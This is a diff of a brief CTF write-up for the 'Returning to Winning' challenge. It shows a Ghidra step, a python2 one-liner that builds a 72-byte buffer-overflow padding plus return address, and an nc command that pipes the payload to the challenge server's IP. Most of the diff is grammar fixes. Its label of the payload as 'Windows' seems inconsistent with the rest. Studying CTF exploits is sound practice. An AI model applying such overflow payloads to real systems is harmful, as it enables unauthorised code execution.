Null5h4rk/CTF_Writeup/ShunyaCTF Aarambha/Returning to Winning/Returning to Winning.md

 Attachment : [Challenge](c)

-In this challenge they provided a attachment first step I done that is ghidra and saw this.
+In this challenge, they provided an attachment.
+The first step I took was to analyze it using Ghidra.
+Here's what I saw:

 ![Ghidra](image.png)

-next where I created a simple payload using python
+Next, I created a simple Windows payload using Python.

 ```python
 python2 -c print'"A"*72 + "\x96\x11\x40\x00\x00\x00\x00\x00"' > payload
 ```
-Then using that payload binary exploited netcat server
+Then using that payload binary exploited netcat server.

 $$
 nc 13.201.11.182 31414 < payload